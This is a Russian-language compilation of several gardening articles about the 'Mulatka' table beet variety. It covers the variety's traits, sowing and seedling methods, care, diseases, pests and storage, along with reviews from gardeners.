1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание сорта свеклы мулатка

Свекла Мулатка — описание сортовых и вкусовых качеств

Подобрать хороший сорт свеклы для своего огорода задача не так проста, как может показаться. Перепробовав множество корнеплодов всех форм и размеров, я остановилась на свекле «Мулатка» после отзывов о ней хорошей знакомой.

Вырастив ее один раз, остаюсь приверженкой этого сорта уже несколько лет. К сожалению, могу предложить вам здесь только фото и описание сорта и настоятельно порекомендовать ее для вашего огорода. Посейте ее и вы увидите, насколько этот сорт нетребователен в уходе, дает хороший урожай вне зависимости от погодных условий.

Свекла «Мулатка» — описание сорта

Сорт столовой свеклы Мулатка нельзя назвать новым, скорее проверенным. В реестр сортов Госсорткомиссии внесен в 2003 году, как районированный для Волго-Вятского, Центрально-Черноземного районов России. Однако на территории страны культивируется повсеместно, с Краснодарского края до районов Дальнего востока. Находит эта замечательная свекла своих приверженцев и на территории СНГ. Ее знают и любят в Молдове, в Казахстане, в Белоруссии.

Свекла Мулатка заявлена как сорт среднего срока созревания, период вегетации от всходов до товарного корнеплода 125-130 дней. Сорт универсальный, одинаково хорош для употребления с грядки, для консервирования, для длительного хранения. Мулатка отличается высокой лежкостью. При правильном хранении она лежит до нового урожая, не вянет и не портится.

Особенности сорта свеклы «Мулатка»:

  • Корнеплод средних размеров, правильной округлой формы, весом от 150 до 350 г. Уродливых или гигантских плодов практически не бывает.
  • Цвет насыщенный, корневой конец темно-фиолетовый, мякоть одноцветная, без светлых колец.
  • Вкус насыщенный свекольный, сладкий. Накопление сахаров до 14,5%, сухого вещества до 20%.
  • При тепловой обработке свекла Мулатка не буреет, не обесцвечивается.
  • Листовая розетка прямостоячая, листья ровные, среднего размера.

Обратите внимание! В «пучковой» спелости Мулатку можно готовить вместе с листом, настолько они нежные и вкусные.

Устойчивость к заболеваниям

По описанию сорта и отзывам садоводов Мулатка устойчива к цветушности другим свекольным болезням. Корнеплоды редко поражаются вредителями, не лопаются в дождливую осень. Профилактикой стрелкования корнеплодов является посадка свеклы в прогретую почву.

Для предотвращения развития болезней на свекле следует соблюдать агротехнику, внести достаточное количество фосфорно-калийных удобрений и перегноя при осенней перекопке. Немаловажное значение для профилактики заболеваний имеет севооборот. На одном месте свеклу можно сеять не ранее чем через 3 года. Растительные остатки по осени следует собрать и утилизировать на компостную кучу.

Особенности агротехники

Сроки посева корректировать следует по погодным условиям. В волго-Вятском регионе сроки посева свеклы вторая половина мая, когда почва достаточно прогретая. Этот корнеплод не любит холода в начале своей жизни, зато достойно переносит небольшие заморозки осенью и может находиться на грядке до октября месяца.

Есть две особенности, которые следует учитывать при посадке. Свекла Мулатка (и отзывы это подтверждают) очень требовательна к освещению и плохо растет на кислых, тяжелых почвах. Участок для посадки рекомендуется готовить с осени. Кислую землю следует нейтрализовать, внеся под перекопку доломитовую муку или известь. Если ощелачивать участок планируете древесной золой, то ее внесение оставьте на весну.

Сеют свеклу рядками, ориентированными с севера на юг. Междурядья оставляют в 30-40 см, между растениями около 20 см. Мулатка не одноростковый сорт. Ее семена прорастают несколькими растениями и нуждаются в прореживании.

Обратите внимание! Свеклу, в отличие от моркови, при прореживании можно пересаживать или выращивать через рассаду.

Поскольку Мулатка имеет компактную листовую розетку, то ее можно высаживать с другими культурами по краю грядки (например, с луком). Это даст дополнительные корнеплоды при нехватке места. После уборки лука корнеплоды будут расти еще минимум 2 месяца и чувствовать себя прекрасно.

Уход за свеклой сорта Мулатка не отличается сложностью. Это регулярный полив, обязательное рыхление почвы, подкормка.

Основные правила выращивания свеклы

  • Для свеклы важно наличие в почве микроэлемента бора – при его дефиците в корнеплоде образуются пустоты и пробковые образования. Подкормку проводят внекорневую, верховым поливом по листьям в пасмурный день. Бор добавляют в виде борной кислоты, дозируя ее 2 г на ведро воды.
  • Участок должен хорошо освещаться солнцем в течение дня. На тенистых участках свекла вырастает бледная.
  • В период активного роста корнеплоды следует подкормить азотными удобрениями 2 раза (1 ст. ложка на ведро) и 2 раза полить соленой водой (1 ст. ложка с горкой на ведро). Это повышает сахаристость и улучшает вкус.

Отзывы

О свекле сорта «Мулатка» положительно отзываются как в плане ее урожайности, так и о вкусовых и товарных качествах.

Лидия, 56 лет, Новосибирск:

Мулатку люблю за неприхотливость и стабильный урожай. Зима у нас долгая, но мулатка лежит до самого лета и никогда не портится. Храню свеклу только в алюминиевых флягах, без наполнителя. Корнеплоды обрезаю с обеих сторон, даю срезам подсохнуть, засыпаю свеклу во флягу и закрываю крышкой без резинки. Весь срок хранения Мулатка будто только с грядки.

Николай, 42 года, Нижегородская область:

Мулатку выращиваю на продажу. Среди прочих сортов она показывает отличную лежкость. Корнеплоды всегда вырастают ровные, гладкие, имеют отличный товарный вид. Покупатели любят ее за небольшие размеры. Такую свеклу удобно варить. Лучший спрос бывает перед новогодними праздниками и весной, перед женским днем.

Елена, 61 год, Воронеж:

Мулатку выращиваю на даче. Очень нравится ее сладость и красивый цвет. Поскольку живем в квартире, то хранить в свежем виде особо негде. Я делаю простые заготовки из отваренной свеклы. Мне Мулатка нравится тем, что открыв баночку я получаю готовый продукт для приготовления салатов или борща, который имеет цвет и вкус настоящей свежей свеклы. Другие сорта при варке становятся бурыми, неприглядными.

Свекла Мулатка: описание сорта, правила выращивания и ухода для хорошей урожайности

Свекла – одна из популярных овощных культур, на одном уровне с томатами и перцами. Ее часто используют для приготовления блюд. Употребляют как в сыром виде, так и в обработанном. Она благотворно влияет на организм. Содержит витамины (А, В1, В2, В3, В9, С, Е), макро и микроэлементы: фосфор, цинк, фтор, железо, марганец, калий, кальций, фолиевая кислота.

В статье пойдет речь о сорте свеклы Мулатка: что он собой представляет, как выращивать, о преимуществах и недостатках, а также – о профилактике и борьбе с заболеваниями и вредителями. В конце приведено несколько отзывов.

Свекла Мулатка: характеристика и описание сорта

Корнеплод имеет классический, вполне традиционный внешний вид. Плоды круглой формы темного насыщенного бордового цвета, иногда — красного. Кожица тоненькая и мягкая на ощупь. Несмотря на это, плоды хорошо сохраняются длительный период времени. Вес одной свеклы сорта Мулатка может быть от 160-ти до 350-ти гр. Внутри мякоти нет колец, которые часто можно встретить у других сортов. На вкус свекла сочная, сладкая и мягкой консистенции.

На сегодняшний день Мулатка – один из лучших сортов для консервирования, приготовления различных блюд.

Свекла Мулатка появилась в 80-е годы прошлого столетия в России. С тех пор, она распространилась за пределы страны. Она неприхотлива в уходе, а потому легко выращивать в разных климатических условиях и на самых разнообразных почвах. Важное условие – правильная подготовка грунта.

Период созревания

Мулатка относится к сортам со средним периодом созревания. Спелые корнеплоды образуются уже через 125 – 130 дней с момента высадки семян в грунт.

Урожайность свеклы Мулатка

Сорт Мулатка имеет довольно высокую урожайность. При должном уходе можно получить урожай 5 — 8 кг с 1 м2. Всего около 2 процентов плодов могут быть непригодными для продажи. С экономической точки зрения, выращивать данный сорт выгодно.

Преимущества и недостатки

Мулатка обладает многими преимуществами, потому его и выбирает так много овощеводов.

Достоинства сорта Мулатка:

  • сочный, сладкий вкус, нежная мякоть;
  • широкое применение в кулинарии: от употребления в свежем виде до приготовления заготовок, закусок;
  • высокая урожайность;
  • стойко переносит температурные изменения, непогоду;
  • простота в уходе;
  • сохранение вкусовых качеств и окраски в процессе варки, тушения.

Среди условных недостатков, пожалуй, можно выделить только обязательную необходимость хорошего освещения. Организовать это достаточно просто, тем более при выращивании свеклы в открытом грунте.

Выращивание свеклы Мулатка: посадка и уход

Выращивать Мулатку можно двумя способами:

  • посадкой семян в грунт;
  • с помощью рассады.

Предпочтительнее традиционный для всех видов свеклы первый вариант, когда семена высеивают сразу в грунт, без проращивания рассады.

Обязательное условие перед посадкой семян – их правильная подготовка. Материал для посадки должен пройти отбор, в процессе которого должны остаться только качественные семена. Оставшийся семенной материал дезинфицируют в растворе перманганата калия. После тщательно промывают обычной водой с дальнейшей просушкой.

Свекла Мулатка — фото

Подготовка почвы

Сорт любит обогащенную питательными элементами, рыхлую почву. Она должна быть обязательно влажной. По кислотности – предпочтительно нейтральная почва или же с невысоким показателем кислотности. Когда этот уровень превышает норму, достаточно внести в грунт известь гашеную. Готовить почву рекомендуют с осени. Высаживать свеклу можно в прогретую до 10-ти градусов почву.

Если грунт не соответствует требованиям, то его легко приготовить вручную, внося питательные вещества и подкормки. После обогащения почвы ее перекапывают и уже после высаживают семена или рассаду.

Отдельное внимание стоит уделить своевременному рыхлению почвы. Особенно это актуально после полива, подкормок, чтобы грунт не уплотнялся. Корневая система растения требует достаточного количества кислорода для развития.

Чтобы растение хорошо развивалось, необходимо учитывать, какие культуры до этого росли на месте посадки. Так, желательно высаживать свеклу после таких предшественников как: огурцы, томаты, картофель и лук. Там, где росла морковь или капуста, от посадки стоит воздержаться.

Посев семян

Принимая во внимания условия климата каждой отдельной территории, посадку семян проводят в середине весны или в мае. Для регионов с холодным климатом, рекомендуют использовать выращивание через рассаду. В южных областях и средней полосе – семена сеют сразу в грунт на постоянное место роста.

Перед посевом грунт в обязательном порядке рыхлят, увлажняют. Высеивают свеклу Мулатка в образовавшиеся после полива бороздки, глубина посева — 3 см, затем семена присыпают грунтом. Кроме этого, проводят рыхление на расстоянии 10-ти см от бороздок.

Из одного семечка образуется сразу несколько растений. При появлении пары зеленых листочков, проводят прореживание, оставляя дистанцию между растениями в 2-3 см. Процедуру повторно проводят после образования 4-5 листиков. Важно соблюдать дистанцию между корнеплодами в размере 7-ми см. Не стоит пренебрегать этим требованием. Это необходимо для развития нормальных здоровых плодов и высокой урожайности.

Тонкости посадки свеклы в открытый грунт

Выращивание свеклы рассадным способом

Когда выращивание проводят рассадным методом, прореживание не требуется. Здесь семена высеивают на самую поверхность грунта, с соблюдением расстояния в пару см. Емкость с дренажем и питательным грунтом готовится заранее.

Предпочтителен следующий состав почвы: грунт, древесные опилки, песок и перегной, в соотношении: 1 : 1/2 : 1/2 : 1.

Посадку на выращивание рассады проводят за 21-28 дней до даты высадки на постоянное место роста. Высаженные семена чуть присыпают грунтом, поливают теплой водичкой в размере 200 гр воды на 1 кг почвы. Сверху накрывают пленкой. Ее убирают при появлении первых росточков. В это же время снижается температура окружающей среды до 14-ти – 16-ти градусов. Важно проводить умеренный полив. Пикировать свекольную рассаду не требуется.

При достижении роста в 8 см и наличии 4-х полноценных листов, рассаду перемещают на постоянное место роста, прежде этого проводя закаливание в течение 10-ти дней, вынося на балкон или на улицу.

При высадке рассады свеклы стоит точно соблюдать дистанцию между сеянцами в 4-5 см. Между рядами этот промежуток составляет от 25-ти – 30 см, не менее. После полива почвы образуются лунки, в которые и переносят рассаду, до шейки корня.

Для лучшего укоренения можно применить раствор гумата и в первые дни высадки беречь рассаду от солнца.

Правильный полив свеклы

Поливают культуру в зависимости от погодных условий. Важно, чтобы грунт был увлажнен в меру. Переувлажнение и недостаток влаги одинаково отрицательно влияют на формирование плодов свеклы.

Примерный график полива свеклы:

  • 2-3 раза в неделю, когда грунт не прилипает к рукам и при хорошем формировании кома;
  • раз в неделю, когда почва прилипает к рукам;
  • раз в две недели, когда при надавливании на землю появляются капельки воды.

Для полива почвы используют простую лейку или капельный метод. Нужно поливать точно под корень, избегая попадания воды на листочки.

Процедуру предпочтительно проводить в вечернее время. Вода должна быть отстоянной.

За 14-21 день до сбора урожая полив приостанавливают.

Болезни и вредители свеклы

Любой сорт свеклы подвержен заболеваниям и нападению вредителей. Мулатка не исключение.

Среди заболеваний возможны:

Профилактикой данных заболеваний является соблюдение правил посева, выращивания и ухода за свеклой. Немаловажно учитывать, какие культуры росли на участке до этого. Когда растение подверглось заболеванию, используют химические препараты.

Из вредителей могут быть:

Самой лучшей профилактикой борьбы со свекольными вредителями является надлежащий, своевременный уход, удаление сорняков, перекапывание грунта. С некоторыми насекомыми можно справиться, обрабатывая свекольные грядки обычной золой.

Сорт свеклы Мулатка – отличный выбор для выращивания на индивидуальных грядках и в больших фермерских полях. Он прост в уходе, неприхотлив к окружающим условиям. Соблюдая простые правила по посадке, уходу, профилактике, даже новичок сможет вырастить вкусные плоды.

Фото свеклы Мулатка

Сорт свеклы Мулатка: отзывы тех, кто сажал

Несколько отзывов о сорте Мулатка.

Валерий:
«В прошлом году было окончательно решено вырастить сорт столовой свеклы Мулатка. На это решение меня натолкнули положительные отзывы в интернете и фотографии обильного урожая. Выделил на своем участке пару грядок. Потребовалось 2 пакета семян. Взошли практически все, даже не ожидал такого результата. Проредил по советам бывалых овощеводов. Из ухода проводил умеренный полив, раз в 14 дней. Урожай свеклы Мулатка получился хороший. Сорт вкусный. В этом году буду продолжать выращивать. Всем овощеводам рекомендую».

Светлана:
«Попробовала в гостях у соседки по даче свеклу, в отварном виде. Понравился сочный, сладкий вкус и одновременно нежная мякоть. Приобрела в магазине семена и посадила на своем дачном участке. Урожай порадовал. Взошел дружно. Негодных к употреблению плодов почти не было, может всего 1-2».

Владимир:
«Чем мне нравится сорт, так это ярким насыщенным «аппетитным» цветом и, конечно же, вкусом. Уже 6-ой сезон подряд выращиваю Мулатку. Ухаживать не сложнее, чем за остальными овощными культурами».

Свекла Мулатка — видео

Свекла «Мулатка»: описание сорта, фото и отзывы

«Героиня» нашей статьи – свекла «Мулатка». Сорт в полной мере соответствует распространенным требованиям и обладает целым рядом свойств, которые делают ее одной из самых востребованных.

Перед каждым дачником стоит непростая задача: разместить на небольшом участке посадки все необходимые овощные культуры таким образом, чтобы иметь возможность обеспечить им достойный уход и получить высокий урожай. Именно поэтому популярностью пользуется столовая свекла тех сортов, которые, имея высокие показатели урожайности, не занимают много места и не усложняют жизнь овощевода лишними «капризами».

Некоторые характеристики сорта приведем в таблице:

Параметр Характеристика
Культура Свекла столовая
Товарность 81-98%
Лежкость Высокая
Урожайность Максимальная 470 ц/га
Форма корнеплода Округлая (опробковение головки отсутствует или очень слабое)
Размер корнеплода Диаметр 5-10 см
Масса корнеплода 160-360 г
Срок созревания Среднеспелый (125-130 дней)
Листья Овальные, зеленые, слабопузырчатые, волнистость края слабая
Мякоть Красная, однородная, сочная
Вкусовые качества Хорошие и отличные
Назначение Универсальное (преимущественно для использования в кулинарии и хранения)
Устойчивость Слабо поражается возбудителями заболеваний и вредителями
Регион допуска Центральный, Волго-Вятский, Центрально-Черноземный, Дальневосточный
Год включения в ФГБУ «Госсорткомиссия» 2003

Происхождение и характеристики сорта

Сорт выведен селекционерами агрофирмы «Поиск». В Государственный реестр включен в 2003 году. Официально рекомендован для выращивания в Центрально-Черноземном и Волго-Вятском регионах, но, как свидетельствуют огородники, успешно культивируется практически во всех климатических зонах России, а также на территориях Украины и Молдовы. Семена свеклы «Мулатка» реализует не только фирма-оригинатор, но и такие известные производители, как «СеДеК», «Сады России», «Аэлита» и другие.

Свекла среднеспелая (урожай обычно готов к извлечению из грунта через 125-130 дней после посева), неприхотливая и очень удобная для возделывания на дачных участках. Ее небольшие листья с фиолетовыми черешками образуют компактную прямостоячую розетку, поэтому «Мулатку» можно с легкостью выращивать в качестве «уплотнителя» посадок таких культур как лук, кустовые кабачки, огурцы и ранняя капуста. Корнеплоды получаются выровненные, средней массой порядка 250 г (от 160 до 360 г в зависимости от почвы и агротехники). Форма корнеплодов округлая, шкурка темно-бордовая, мякоть ярко-красная, однородная, очень вкусная и сочная. В ней содержатся:

Питательные и полезные вещества Количество
Сухие вещества 18,3-19,8%
Общие сахара 14,2-14,6%

По отзывам, свекла «Мулатка» прекрасно подходит для любых видов переработки, не вянет и не портится в процессе хранения в течение всего зимне-весеннего сезона. Корнеплоды имеют форму и размер удобные для отваривания в целом виде. Мякоть не теряет цвет при тепловой обработке и мариновании, хорошо переносит заморозку. Пучковая продукция, которую получают при прореживании посадок, идет в пищу вместе с нежной ботвой.

Урожайность может достигать 4,5 кг на квадратный метр (при посеве в индивидуальные грядки), выход продукции товарного качества на уровне 81-98%.

Рекомендации по агротехнике

Сорт устойчив к непродолжительным похолоданиям и недостатку влаги, не склонен к цветушности. Растения практически не поражаются вредителями и возбудителями заболеваний. Сложностей при выращивании, как правило, не возникает даже у самых неискушенных дачников.

Из агротехнических процедур самыми важными считаются прореживания, регулярное рыхление междурядий (во избежание образования корки, не пропускающей воздух к корням растений) и поддержание необходимых показателей кислотности почвы. Внесения подкормок во время вегетации обычно не требуется, особенно, если свеклу сеют на участке, который удобряли в прошлом сезоне.

«Мулатка» – очень удобный, урожайный и неприхотливый сорт, достойный занять место на каждом огороде.

Отзывы дачников

Долго выбирала круглоплодный сорт, пока не остановилась на этом. Все устраивает: и размер корнеплодов (средний, удобный для варки), и вкус, и лежкость. Участок у меня небольшой, а свеклы нужно довольно много. Люблю из нее готовить и свежий сок зимой пить (очень полезно). Этот сорт можно сажать как в отдельную грядку, так и по краям грядок с огурцами и кабачками. А еще я ее сею в грядку с луком (на репку), практически «вразброс». В августе лук убираю, и свекла получает возможность набрать нормальный размер корнеплодов. Храню в погребе, раскладываю прямо поверх картошки. Так свекла не портится, и вдобавок поглощает лишнюю влагу, которая может испортить картошку. У меня корнеплоды не вянут, но и не плесневеют. Очень удачный сорт, всем советую.

Валентина, 37 лет, г. Кимры

Мне «Мулатка» нравится тем, что не перерастает (в отличие от многих других круглоплодных). Проблем с выращиванием не заметила и без урожая не осталась ни разу за последние 4 года. Правда, почва у нас кисловата для свеклы, приходится вносить золу или доломитовую муку под посадку. Зато похолодания сорт переносит успешно, да и частых поливов не требует (для меня это актуально). Спелые корнеплоды очень хороши: ровные, кругленькие, с тонкими «хвостиками». Мякоть вкусная, яркая. Места для хранения свежих овощей у меня немного. Приходится перерабатывать. Закатываю заправку для борща и маринованную смесь с зеленью и сладким перцем для винегретов. В прошлом году попробовала заморозить отварную свеклу, нарезанную брусочками. Тоже неплохо оказалось: вкус и цвет сохраняются, если оттаивать постепенно в холодильнике.

Анна, 42 года, Московская область

До прошлого года из круглых сажала «Бордо», «Одноростковую» и «Детройт». Захотела чего-то нового. Выбрала свеклу «Мулатка» по фото на упаковке от фирмы «СеДеК» – очень привлекательно выглядели корнеплоды. Посеяла в открытый грунт во второй половине апреля. Взошла свекла очень дружно и даже почти не пострадала от внезапного похолодания. Прореживала в первый раз в стадии 2 настоящих листиков, чтобы избавиться от лишних росточков. Второе прореживание специально не делала, просто периодически на летние борщи выдергивала кустики там, где они росли гуще всего. Подкормки не вносила: грядка была после огурцов, удобренная в предыдущем сезоне. Поливала умеренно, после поливов рыхлила междурядья до момента «смыкания» ботвы. Урожай получился очень приличный: с пятиметровой грядки почти 20 кг ровненьких, здоровых корнеплодов. Мелочи практически не было, как и неудобных для варки «гигантов». Вкус и сочность оказались «на пятерку». Хранила свеклу в погребе (под гаражом), в ящиках с песком. Порчи не заметила; последние корнеплоды съели в начале марта. Сорт показал себя отлично! Подходит всем, кто хочет получить достойный урожай свеклы без особых хлопот.

Видео

Об урожае свеклы сортов «Мулатка» и «Деликатесная» рассказывает следующий видеосюжет:

Окончила МГРИ им. Орджоникидзе. По основной специальности – горный инженер-геофизик, а значит человек с аналитическим складом ума и разнообразными интересами. Имею собственный дом в деревне (соответственно, опыт огородничества, садоводства, грибоводства, а также возни с домашними животными и птицей). Фрилансер, в отношении своих обязанностей перфекционист и «зануда». Любитель хенд-мейда, создатель эксклюзивных украшений из камней и бисера. Страстный почитатель печатного слова и трепетный наблюдатель всего, что живет и дышит.

Сладкая и полная витаминов свекла «Мулатка»: как вырастить богатый урожай и куда его применять

Свекла — незаменимый продукт как на обычной кухне, так и в масштабах пищевой промышленности. Например, свекольный порошок — это натуральный краситель, он присутствует не только в кетчупах и пастах, но и в сладких десертах. Кроме того, овощ необычайно полезен, содержит в себе богатый комплекс витаминов и минералов. Чтобы не тратить время на поиски качественной свеклы в супермаркетах, многие огородники предпочитают выращивать ее самостоятельно.

Среди всего многообразия выделяется сорт Мулатка, его любят за сладкий вкус и простоту в уходе. Разберем подробнее, что из себя представляет свекольный сорт Мулатка и как получить хороший урожай.

Описание сорта

Мулатка — это среднеспелый сорт, первый урожай собирают спустя 110-120 дней с момента посадки. Сорт — любимчик многих огородников, его плоды имеют прекрасный сочный вкус и привлекательный товарный вид.

Происхождение и развитие

Появился сорт Мулатка благодаря трудам российских селекционеров в конце 80-х годов ХХ века. Растение быстро получило широкое распространение среди огородников и фермеров. Помимо России, культуру активно выращивают на Украине, где свеклу называют «буряк», в Молдове и Белоруссии. И по сей день сорт Мулатка ценят за высокую урожайность и устойчивость к болезням.

Отличительные черты

Свекольные кустики среднего размера, листья овальные, светло-зеленого цвета. Пластина гладкая с волнистыми краями. У растения высокий иммунитет перед непогодой и другими внешними факторами. Мулатка имеет долгие сроки хранения, не теряет свои вкусовые и внешние качества.

Характеристика плодов и урожайность

Вес плода варьируется от 160 до 350 г. Цвет красно-бордовый, насыщенный. Поверхность у свеклы гладкая и ровная, а форма округлая. Мякоть в разрезе нежная и сочная, с высоким содержанием сахара. С 1 кв. м дачники собирают около 5 кг спелых и аппетитных плодов.

Интересно! Благодаря неприхотливости в уходе свекла возделывается даже в Магаданской и Сахалинской областях, а также в Якутии.

Как выращивать

Выращивание свеклы Мулатка — процесс несложный, главное — соблюдать все агротехнические приемы и правила. Высаживают культуру рассадным или безрассадным способом. Первый подходит для регионов с непредсказуемыми климатическими условиями, второй уместен в областях с теплой погодой и плодородной почвой.

Посадка семенами

Перед посадкой семенами обязательно продезинфицируйте посевной материал с помощью раствора марганцовки или сока алоэ. Поместите семена в тканевый мешочек, после чего опустите его в подготовленную жидкость. Обеззараживание понижает риск развития заболеваний в будущем, а также повышает иммунитет растения.

Следующий этап — это подготовка земли. Свекла — растение неприхотливое, но лучше сажать ее на сухом и рыхлом земельном участке. В конце октября перекопайте будущие грядки, уберите весь мусор, сожгите сорняки. С приходом весны повторно перекопайте землю, после чего добавьте на грядки речного песка или извести. Это необходимо для того, чтобы сделать почву более рыхлой и снизить ее кислотность.

Как только грядки будут готовы, сделайте в земле небольшие бороздки на расстоянии 30 см друг от друга. Поместите в них обеззараженные семена и присыпьте сверху землей, обильно полив теплой водой.

Важно! Опытные фермеры советуют для полива использовать дождевую воду. Ее состав оптимально подходит для полива молодых саженцев, не содержит в себе патогенных микроорганизмов. Чтобы без труда собрать дождевую воду, просто поставьте на участке пару пустых баков. Если рядом есть домик, соорудите над емкостями сточные поверхности.

Посадка рассадой

Рассада помогает росткам быстрее прижиться на грядках, без проблем перенести заморозки и прочие неблагоприятные условия. Для рассады понадобится емкость. Это может быть все что угодно: пакеты из-под молока или кефира, деревянные ящики, цветочные горшки и даже пластиковые стаканчики. Не забудьте перед посадкой тщательно помыть тару, высушить ее и обработать слабым раствором марганца.

Заранее подготовьте почву для рассады. Некоторые огородники предпочитают использовать смесь земли с огорода, торфа и перегноя. Другие садоводы приобретают специальную почву «Крепыш» или грунт «Универсальный». Главное, чтобы земля была чистая, без опасных микробов, личинок и постороннего мусора. Чтобы быть уверенным в качестве грунта, садоводы советуют обеззаразить землю с помощью зольного раствора.

Рассаду подготавливают за 3-4 недели до высадки свеклы в грунт. Высаживают семена на расстоянии 2 см друг от друга. После посева присыпают тонким слоем земли и поливают небольшим количеством воды, примерно 1 л на 1 кг почвы. После чего накрывают саженцы пленкой или тонким стеклом и помещают в самое теплое и светлое место в доме. Как правило, это подоконник.

Важно! Рассада свеклы требует к себе внимания и ухода. Поливают ростки каждые 7 дней, преимущественно утром или вечером. Используют только отфильтрованную теплую воду. Через 2 недели с момента посадки саженцы подкармливают жидким птичьим пометом или настоем крапивы. Для более ускоренного развития добавляют стимулятор роста «Корневин».

Своевременный и грамотный уход — это залог вкусного богатого урожая. При поливе ориентируйтесь на погодные условия. Если лето выдалось жарким и влажным, поливайте свекольные грядки каждые 7-10 дней. Если стоит сухая погода и нет дождей, увлажняйте почву 1 раз в 5 дней. Используйте только дождевую или отстоянную воду. Для избежания солнечных ожогов увлажняйте почву рано утром или после захода солнца.

После полива на почве может образовываться тонкая корка. Она затрудняет доступ кислорода к корням. Поэтому грядки нужно регулярно рыхлить. Рыхлят землю каждые 7 дней, совмещая с удалением сорной травы. Прополка поддерживает на грядках чистоту и условия для нормального развития свеклы.

Свекла Мулатка нуждается в минеральных подкормках и органических удобрениях. Это могут быть корневые подкормки, например хлористый калий или суперфосфат, а также внекорневые — опыление кустов мыльным или луковым раствором.

Всего за период созревания культуры проводят 3-4 подкормки, которые не только защищают грядки от болезней и вредителей, но и улучшают вкусовые качества плодов.

Особенности выращивания и возможные трудности

Будьте аккуратны с азотными подкормками, так как их переизбыток вызывает повышенный уровень нитратов в плодах. Своевременно вносите удобрения, содержащие медь, бор и молибден. В противном случае качество плодов заметно испортится.

Если листья свеклы приобретают светлый оттенок, срочно подкормите растения калиевыми добавками. Бывают ситуации, когда ботва приобретает красный цвет. Это значит, что растению не хватает натрия или в почве превышен уровень кислотности. Для устранения проблемы огородники советуют посыпать грядки золой и полить кустики соленой водой.

Интересно! В Древнем Риме свекла считалась символом ссор. Однако люди все равно активно употребляли в пищу корнеплоды, ботву и даже корни молодых растений. Перед этим римляне замачивали их в воде и посыпали перцем.

Советы опытных огородников

Для повышения количества и качества урожая опытные огородники рекомендуют применять особые правила и секреты выращивания.

Важные рекомендации:

  • лучшими предшественниками для свеклы признаны огурцы, картофель, лук и томат;
  • не сажайте культуру после моркови или других свекольных сортов;
  • для большей сахарности поливайте грядки раствором соли из расчета 1 ст. л. на 10 л воды;
  • свекла любит влагу — на 1 кв. м уходит около 20 л воды;
  • по возможности используйте капельную систему орошения. Она экономит воду и направляет ее прямо под корень, минуя стебли и листья;
  • за месяц до уборки урожая старайтесь не переувлажнять почву;
  • для ускорения роста накройте грядки вермикулитом или торфом.

Болезни и вредители

При неправильном уходе культура может заболеть грибковыми инфекциями или вирусными заболеваниями.

Наиболее распространенные из них — это:

  1. Мучнистая роса, проявляется в виде белого налета на листьях и стеблях. Причины заболевания — повышенная влажность, зараженная почва, несвоевременная прополка грядок. В качестве профилактически поливайте кустики раствором на основе сока алоэ, соблюдайте правила севооборота. Если мучнистая роса уже появилась на грядках, обработайте пораженные участки молотой серой.
  2. Фомоз в первую очередь поражает листья, покрывает их желтыми пятнами. Через 2-3 дня болезнь переходит на корнеплоды, и свекла начинает гнить. Для предотвращения фомоза обрызгивайте огород раствором бордоской жидкости. Для лечения необходимо протравливание грядок 0,4 % хлорокисью меди.

Из вредителей на грядки нападает свекловичная мошка и тля. Насекомые располагаются на листьях растений и высасывают из них жизненно необходимый сок. По этой причине развитие плодов замедляется, вкусовые качества ухудшаются. Для профилактики огородники советуют обрызгивать грядки мыльным раствором, вовремя рыхлить их и удалять сорняки.

Еще один опасный вредитель — медведка. Насекомое живет в земле, не погибает даже зимой при низких температурах. Медведка откладывает яйца и устраивает под грядками гнезда. Личинки начинают грызть корни растения, что приводит к нарушению обмена веществ. Избавиться от медведки поможет сухая яичная скорлупа или опрыскивание грядок раствором медного купороса.

Сбор и применение урожая

Урожай Мулатки собирают до наступления первых заморозков. Выкапывают свеклу вилами, после чего очищают от земли и раскладывают на грядке. Далее отрезают ботву, оставляя небольшой черешок. Для хранения отбирают ровные и красивые плоды, без царапин и гнили.

Лучше всего овощи хранятся в деревянных или пластмассовых контейнерах, накрытых сверху пленкой. Оптимальная температура воздуха для хранения свеклы Мулатка от 0 до +2 градусов.

Сорт используют для приготовления самых разных блюд. Например, прекрасным дополнением к ужину будет салат из чеснока и чернослива, а праздничный стол украсит печеночно-свекольный торт. Также большой популярностью пользуется салат из свеклы с орехами, борщ, селедка под шубой, винегрет.

Плюс ко всему из свеклы готовят сладкие и полезные десерты: свекольные блины на ряженке, шоколадный пирог со свеклой и орехами, свекольные оладьи.

Интересно! Свекла — универсальное домашнее лекарство. Она оказывает противовоспалительный, мочегонный и ранозаживляющий эффект. Кроме того, в свекле содержится йод, витамины группы В, минералы. Регулярное употребление свеклы улучшает пищеварение, способствует снижению лишнего веса. Овощ идеально подходит для диетического и детского питания. Также свекла служит отличным средством для красоты волос и кожи.

Преимущества и недостатки сорта

К преимуществам сорта Мулатка огородники относят простоту в уходе, привлекательный внешний вид и высокие вкусовые качества. Свекла универсальна в применении, в плодах содержится большое количество сахара, что делает блюда более вкусными. Плюс ко всему Мулатка показывает стабильную и отличную урожайность, несмотря на погодные условия и регион выращивания.

Недостатки: время от времени овощ заболевает или подвергается воздействию насекомых-вредителей. В остальном же сорт Мулатка характеризуется как урожайный и вкусный.

Отзывы фермеров

О сорте Мулатка в интернете попадаются самые разные отзывы. Одни огородники называют Мулатку своим любимым сортом, другие же остались недовольны собранным урожаем.

Мария, г. Орел: «Сколько себя помню, все время выращивала на участке именно свеклу Мулатка. Мне нравится то, что она всегда получается красивая и ровная, с аппетитным бордовым окрасом. Добавляю в салаты и супы, делаю сок — на вкус плоды превосходные. Рекомендую выращивать».

Олег, г. Москва: «Посадил на участке сорта Красный шар и Мулатка, но особенно остался доволен Мулаткой. Лето выдалось сухим, но сорт все равно показал отличный урожай. С 1 кв. м собрал 6 кг! На мой взгляд, это отличный показатель урожайности, обязательно буду сажать еще в следующем году».

Айгуль, г. Тюмень: «Высаживала Мулатку в открытый грунт. К сожалению уже через 3 недели на маленьких кустиках увидела тлю. Избавиться от нее помог мыльный раствор. Но качество урожая заметно испортилось по сравнению с прошлым годом. В будущем сезоне попробую посадить более устойчивый к насекомым сорт».

Заключение

Свекла — полезный и незаменимый в рационе продукт. Она дает организму витамины, повышает иммунитет. Самые вкусные овощи те, которые выращены на собственном участке. Сорт Мулатка универсален и легок в уходе, поэтому получить достойный урожай удастся даже начинающему огороднику. В уходе сорт Мулатка прост, не требует особых навыков. При этом свеколки вырастают красивыми и аппетитными.

Свекла Мулатка — описание сортовых и вкусовых качеств

Свекла «Мулатка» — описание сорта

